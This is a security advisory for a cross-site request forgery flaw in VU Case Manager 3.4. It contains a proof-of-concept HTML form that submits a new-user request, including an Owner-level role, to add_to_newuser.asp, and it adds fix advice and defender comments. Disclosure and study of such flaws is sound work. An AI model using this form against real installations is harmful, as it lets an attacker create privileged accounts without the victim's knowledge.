< ------------------- header data start ------------------- >

#############################################################

# Application Name :VU Case Manager 3.4

# Vulnerability Type : XSRF (cross-site request forgery, CSRF)

# Impact : An admin or user account can be added remotely and automatically.

# Bug Fix Advice : A session key (session token) should be added to the form, and the old password should be requested.

# author : BUG RESEARCHERS//CWH1RLPOOL

#############################################################
< ------------------- header data end of ------------------- >

< -- bug code start -- >

<!-- Reproduction of the application's "new user" form, as given by the advisory.
     The form POSTs to add_to_newuser.asp with these fields: username, userpassword,
     userfullname, userlevel and client. No hidden per-session token field is present,
     which is the weakness the advisory header reports (XSRF).
     NOTE(review): presumably the endpoint authorises the request from the session
     cookie alone; confirm against the server-side code.
     Fix, per the advisory: add a session token to the form and ask for the old
     password; the token has to be checked by add_to_newuser.asp to have any effect. -->
<!-- NOTE(review): CheckForm() is not defined anywhere in this listing, and attribute
     values here are unquoted. Client-side validation is not a security control in any
     case; the server must validate and authorise the request itself. -->
<form name=NEWUSER method=post action=http://localhost/casemng/add_to_newuser.asp onsubmit=return CheckForm()>



<table width=575 border=0 cellspacing=0 cellpadding=5 bordercolor=white>

<tr>

<td width=139 bgcolor=f5f5f5> <div align=right>*User Logon Name:</div></td>

<td width=416> <input type=text name=username maxlength=20 size=20>

</td>

</tr>

<tr>

<td width=139 bgcolor=f5f5f5> <div align=right>*User password:</div></td>



<td width=416> <input type=password name=userpassword size=20 maxlength=20>

</td>

</tr>

<tr>

<td colspan=2><strong><font color=#990000 size=1 face=Verdana, Arial, Helvetica, sans-serif>select

one of the following:</font></strong></td>

</tr>

<tr>

<td width=139 bgcolor=f5f5f5> <div align=right>*User Full Name:</div></td>



<td width=416> <p>

<input type=text name=userfullname size=30 maxlength=50>

ex.: John Smith</p></td>

</tr>

<tr>

<td bgcolor=f5f5f5> </td>

<td><font size=1 face=Verdana, Arial, Helvetica, sans-serif><strong>Note:

the name will always appear in the list of staff to be selected

for the case assignment</strong></font></td>

</tr>



<tr>

<td bgcolor=f5f5f5><div align=right>*Assign Level:</div></td>

<!-- The privilege level is taken from the request body (3 = Owner, 2 = Editor), so
     the endpoint decides the new account's role from client-supplied data. The server
     should verify the caller's own role before honouring this value. -->
<td> <select name=userlevel>

<option value=>--select Role--</option>

<option value=3>Owner</option>

<option value=2>Editor</option>

</select></td>



</tr>

<tr>

<td bgcolor=f5f5f5> </td>

<td><font size=1 face=Verdana, Arial, Helvetica, sans-serif><strong>Owner

= full access (manager)<br>

Editor = full access but limited to deletion (staff)</strong></font></td>

</tr>

<tr>

<td width=139> <div align=left><font color=#FF0000><strong>OR</strong></font></div></td>



<td width=416><font size=1 face=Verdana, Arial, Helvetica, sans-serif> </font></td>

</tr>

<tr>

<td bgcolor=f5f5f5><div align=right>*Client Name:</div></td>

<td><input type=text name=client size=40 maxlength=50> <!--onBlur=return CheckLevel();-->

ex.: Microsoft Corp.</td>

</tr>

<tr>

<td bgcolor=f5f5f5> </td>



<td><font size=1 face=Verdana, Arial, Helvetica, sans-serif><strong>Note:

client’s name will appear in the list of companies while entering

inventory items</strong></font></td>

</tr>

</table>
<p>

<!-- Detection hint for defenders: account-creation POSTs to add_to_newuser.asp whose
     Origin or Referer header is not the application's own host are worth logging and
     rejecting. -->
<input type=submit name=Submit value=Submit>

<input type=reset name=Reset value=Reset>

</p>

</form>

< -- bug code end of -- >